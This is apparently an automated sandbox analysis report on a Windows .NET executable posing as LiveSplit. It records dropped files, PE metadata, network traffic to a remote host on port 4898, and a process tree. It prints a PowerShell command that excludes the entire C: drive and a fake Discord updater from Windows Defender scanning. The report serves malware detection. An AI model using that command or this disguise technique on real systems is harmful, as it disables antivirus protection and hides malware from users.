Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.`.................. ..t......N. .. .... ...@.. .......................`'...........@................................... .K..... .Dq...................@'...................................................... ............... ..H............text...T. .. .... ................. ..`.rsrc...Dq.... ..r.... .............@..@.reloc.......@'.......&.............@..B................0. .....H........5...,...........a..? .........................................j...9....&(....8....&8......s....(....t.....9....&8.........8......~.....z.(......:....&8....(....8.........0.......... .U...:....&.s.....:~...&.s....%o..........s......:e...&r...p(.......r3..p(....(..... .... ....s..... .....o....&. ....o....&rK..p(....8....(....8v....8}...(....8....*..0..m.......s....o....&.s.....s.....:?...&......s..... .... ....s..... .....o....&o....r...p.:....&8.....8....(....8

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\0kEuVjiCbh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20210719\PowerShell_transcript.210979.rVnByxOB.20210719133802.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5997
Entropy (8bit):	5.385102559671395
Encrypted:	false
SSDEEP:	96:BZTnhoN4sqDo1ZB4LZdhoN4sqDo1ZE28srZ5hoN4sqDo1ZpDii2Zd:fmL
MD5:	B04AF5F505D010A5750160AC595A5142
SHA1:	5F0D7C5F38676D93336F6123C833C72817508BCA
SHA-256:	6982AD7E809EB085D9F342B670BD4B75096636D0E999C78A97C85234C28FECA2
SHA-512:	7C8E8DDE56B7DE510B4288ED1F00266651E1BF57845C273B9B0716F6191B89AAA221918493F59121878C70504F22A8B084CC0C11516D0DEA2DA2023E6CCFA5EC
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210719133813..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 210979 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'..Process ID: 3120..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210719133813..******************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'..********************..Windows PowerShell transcr

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.964891082806616
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	0kEuVjiCbh.exe
File size:	2553856
MD5:	1aa4ec7db318a524fdfb5aaff61a1031
SHA1:	bb804be3028c6cbcc62e81fb70482c1a2444667f
SHA256:	ba47f657a4745c96a62c444100d6c38bbff772b47ac03e83dc3ef5d94bc1d77c
SHA512:	42ef70b612db878e77e32efa9a0a485c5670452563b74e246902197eba7f33823e0da86ef5842115a84ad003eb1e018a2d9bf216e4545c5c3b32e90792d5e568
SSDEEP:	49152:332SKzAnWx/9H4GiwfQTuWwACHst9qxTcAGlrOOgl0UVODO:H2SKRZkLwACsqxTGlrOF0UVO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.`.................. ..t......N. .. .... ...@.. .......................`'...........@................................

File Icon


Icon Hash:	f14cd6920f4d8ed4

Static PE Info

General
Entrypoint:	0x60a14e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60F131C5 [Fri Jul 16 07:14:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20a100	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20c000	0x67144	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x274000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x208154	0x208200	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x20c000	0x67144	0x67200	False	0.808098958333	data	7.51842704396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x274000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x20c280	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0x20c6e8	0x988	data
RT_ICON	0x20d070	0x10a8	data
RT_ICON	0x20e118	0x25a8	data
RT_ICON	0x2106c0	0x4228	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x2148e8	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x225110	0x8cd8	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x22dde8	0x44dd3	PNG image data, 1050 x 1050, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x272bbc	0x76	data
RT_VERSION	0x272c34	0x35c	data
RT_MANIFEST	0x272f90	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013
Assembly Version	1.0.0.0
InternalName	ConsoleApp7.exe
FileVersion	1.0.0.0
CompanyName	http://livesplit.org/
LegalTrademarks
Comments	LiveSplit
ProductName	LiveSplit
ProductVersion	1.0.0.0
FileDescription	LiveSplit
OriginalFilename	ConsoleApp7.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 19, 2021 13:38:07.635581017 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:10.642175913 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:16.658391953 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:27.082604885 CEST	4898	49733	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:27.082737923 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:27.083300114 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:30.096924067 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:30.169343948 CEST	4898	49733	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:30.169433117 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:32.738914013 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:33.224962950 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:36.238230944 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:36.457355022 CEST	4898	49733	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:36.457508087 CEST	49733	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:42.254266977 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:49.728615999 CEST	4898	49738	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:49.728853941 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:49.729967117 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:51.859190941 CEST	4898	49738	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:51.901927948 CEST	4898	49738	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:51.901947975 CEST	4898	49738	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:51.902081966 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:51.979367971 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:53.618118048 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:53.751027107 CEST	4898	49738	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:53.751117945 CEST	49738	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:53.825381041 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:55.662643909 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:55.662962914 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:55.666465998 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:55.977556944 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:58.221019030 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:58.221088886 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:58.221354961 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:58.304172039 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:58.585674047 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:58.585897923 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:59.179794073 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:38:59.179924011 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:59.583484888 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:38:59.822694063 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:00.079354048 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:00.079828978 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:00.730178118 CEST	4898	49741	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:00.730288029 CEST	49741	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:00.731496096 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:00.731653929 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:00.732490063 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:01.051829100 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:04.662014008 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:04.780689955 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:04.858292103 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:04.858324051 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:04.858519077 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:04.859002113 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:05.250891924 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:05.250994921 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:05.656205893 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:05.656483889 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:06.350770950 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:06.350961924 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:07.751497030 CEST	4898	49743	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:07.751624107 CEST	49743	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:07.803304911 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:08.798510075 CEST	4898	49744	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:08.798794985 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:09.909928083 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:11.867331982 CEST	4898	49744	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:11.867666960 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:13.835026979 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:13.968844891 CEST	4898	49744	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:16.311836004 CEST	4898	49744	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:16.311863899 CEST	4898	49744	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:16.312035084 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:16.372997046 CEST	49744	4898	192.168.2.3	185.244.30.28
Jul 19, 2021 13:39:17.873743057 CEST	4898	49744	185.244.30.28	192.168.2.3
Jul 19, 2021 13:39:20.072101116 CEST	4898	49744	185.244.30.28	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 0kEuVjiCbh.exe PID: 5952 Parent PID: 5764

General

Start time:	13:37:07
Start date:	19/07/2021
Path:	C:\Users\user\Desktop\0kEuVjiCbh.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\0kEuVjiCbh.exe'
Imagebase:	0xb0000
File size:	2553856 bytes
MD5 hash:	1AA4EC7DB318A524FDFB5AAFF61A1031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 1308 Parent PID: 5952

General

Start time:	13:37:57
Start date:	19/07/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs'
Imagebase:	0x1320000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 0kEuVjiCbh.exe PID: 4872 Parent PID: 5952

General

Start time:	13:37:59
Start date:	19/07/2021
Path:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Imagebase:	0x410000
File size:	2553856 bytes
MD5 hash:	1AA4EC7DB318A524FDFB5AAFF61A1031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 23%, Metadefender, Browse Detection: 48%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 3120 Parent PID: 1308

General

Start time:	13:37:59
Start date:	19/07/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'
Imagebase:	0x3d0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3216 Parent PID: 3120

General

Start time:	13:37:59
Start date:	19/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 0kEuVjiCbh.exe PID: 4868 Parent PID: 5952

General

Start time:	13:38:00
Start date:	19/07/2021
Path:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Imagebase:	0x20000
File size:	2553856 bytes
MD5 hash:	1AA4EC7DB318A524FDFB5AAFF61A1031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 0kEuVjiCbh.exe PID: 3880 Parent PID: 5952

General

Start time:	13:38:01
Start date:	19/07/2021
Path:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Imagebase:	0x4a0000
File size:	2553856 bytes
MD5 hash:	1AA4EC7DB318A524FDFB5AAFF61A1031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 0kEuVjiCbh.exe PID: 1832 Parent PID: 5952

General

Start time:	13:38:03
Start date:	19/07/2021
Path:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe
Imagebase:	0xf80000
File size:	2553856 bytes
MD5 hash:	1AA4EC7DB318A524FDFB5AAFF61A1031
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 0kEuVjiCbh.exe PID: 5952 Parent PID: 5764 0kEuVjiCbh.exeCOMMON

Executed Functions

Function 06FB5B60, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65bfa0c48c6cd4ce31ef095d2aa0b5b012d3ed1f9d3d3d42bad84d68aad65f41
Instruction ID: 69c8ef4202a908f43dbc20c5b159ab0305867c87713ca61c8c2385f96f4cdf99
Opcode Fuzzy Hash: 65bfa0c48c6cd4ce31ef095d2aa0b5b012d3ed1f9d3d3d42bad84d68aad65f41
Instruction Fuzzy Hash: FF425A70A042449FDB55EF6AC494AAEB7F2BF88304F19846DE906DB391DB34EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06FB053F, Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92746dbcf5e9be64abd9fc7feb8554c49d04ba3058a568302659675b8fc4ace
Instruction ID: ba2eb569bb46908164cef33dbf8e1008902e780b9a57f8f5e03f166ecefd2803
Opcode Fuzzy Hash: f92746dbcf5e9be64abd9fc7feb8554c49d04ba3058a568302659675b8fc4ace
Instruction Fuzzy Hash: AC42A971F01704DFDB649F2AC5886AAB7F2BF84345F14886DE5128B6A0DF74E881CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06FB6860, Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61fbb264869cca869057ad940bcdbbaf6eff50e6023b810567a3ea1b23cb377d
Instruction ID: c8ce91f948acec68d3f3094da7712c840323e3d074ba19ee275c2ba1ca5538ab
Opcode Fuzzy Hash: 61fbb264869cca869057ad940bcdbbaf6eff50e6023b810567a3ea1b23cb377d
Instruction Fuzzy Hash: 6F225670A01218DFDB55DF65D884BADBBB2BF89301F1090AAE809EB251DB31DD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06FB53F0, Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd0b8f5c7139ad940a4a0181e40811c1d1951305a071da9335a1210b7dd84c7
Instruction ID: f7ab8cbe651c4bd150b2a021bb349144eb26ea48c4d792485121faae9019d989
Opcode Fuzzy Hash: ebd0b8f5c7139ad940a4a0181e40811c1d1951305a071da9335a1210b7dd84c7
Instruction Fuzzy Hash: 9E126C74A04245DFC744DF69C584AAABBF2FF88310B1AC4A9E949DB362C734ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06FB2C90, Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1afc4dc4af032ea012d54254c89711727c1c42da19979dc87dde3e8b9249069f
Instruction ID: 925900c1413b64cad791896a735adaf07b39ed41bf1443e2cf9e712ecafc97a3
Opcode Fuzzy Hash: 1afc4dc4af032ea012d54254c89711727c1c42da19979dc87dde3e8b9249069f
Instruction Fuzzy Hash: 9C026B35E00705CFDBA5CF6AC484AAABBF2FF88300F149569E45A9B761C735E945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0240B670, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0240B6D0
GetCurrentThread.KERNEL32 ref: 0240B70D
GetCurrentProcess.KERNEL32 ref: 0240B74A
GetCurrentThreadId.KERNEL32 ref: 0240B7A3

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 227def48eb9e06356d85cdb779a94d9a1803195a2583843c57bcfa68667af790
Instruction ID: 6a8fa9c3b96107116ac5bc32958bd9bcafd9f871d683b176f6b5dbfa24d771f6
Opcode Fuzzy Hash: 227def48eb9e06356d85cdb779a94d9a1803195a2583843c57bcfa68667af790
Instruction Fuzzy Hash: CF514AB0900649CFDB14DFA9D588B9EBBF1FF48318F24846AD019A7390D774A984CF66

Uniqueness

Uniqueness Score: -1.00%

Function 06FBA190, Relevance: 3.3, Instructions: 3266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c76c9734498f689c50730676ffdbcd7440219c6928d66da8cc1f24a1114792
Instruction ID: 96fb04514a69a6bb8aa7f1e642241d6e8ed571c58169630f5d6d686003cc6e65
Opcode Fuzzy Hash: 57c76c9734498f689c50730676ffdbcd7440219c6928d66da8cc1f24a1114792
Instruction Fuzzy Hash: 47636070A40218EFEB659B90CC55BEE7676EB88704F1080E9E74A6B3D0CF715E819F15

Uniqueness

Uniqueness Score: -1.00%

Function 0240FCCC, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0240FDEA

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fd410445005ba5690d0a7a2c1c1e25b9d1f4a3fd015d5e040929ad3558fef40b
Instruction ID: df0e7802157806543dfac0a02e6ab496bf3b5c2d6ea4f9a9933eae25f8533863
Opcode Fuzzy Hash: fd410445005ba5690d0a7a2c1c1e25b9d1f4a3fd015d5e040929ad3558fef40b
Instruction Fuzzy Hash: BA51D4B1D003499FDB14CF9AC884ADEFBB1FF48314F25812AE419AB650D7749986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0240FCD8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0240FDEA

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9805e4ef3f682164f914ac087e7c73ddf0867b22b096466dfb54f8f56d3a4376
Instruction ID: ff195202f9163d88fe236abe4d9a17020fb66ce5416c56bad55cde86f7310d64
Opcode Fuzzy Hash: 9805e4ef3f682164f914ac087e7c73ddf0867b22b096466dfb54f8f56d3a4376
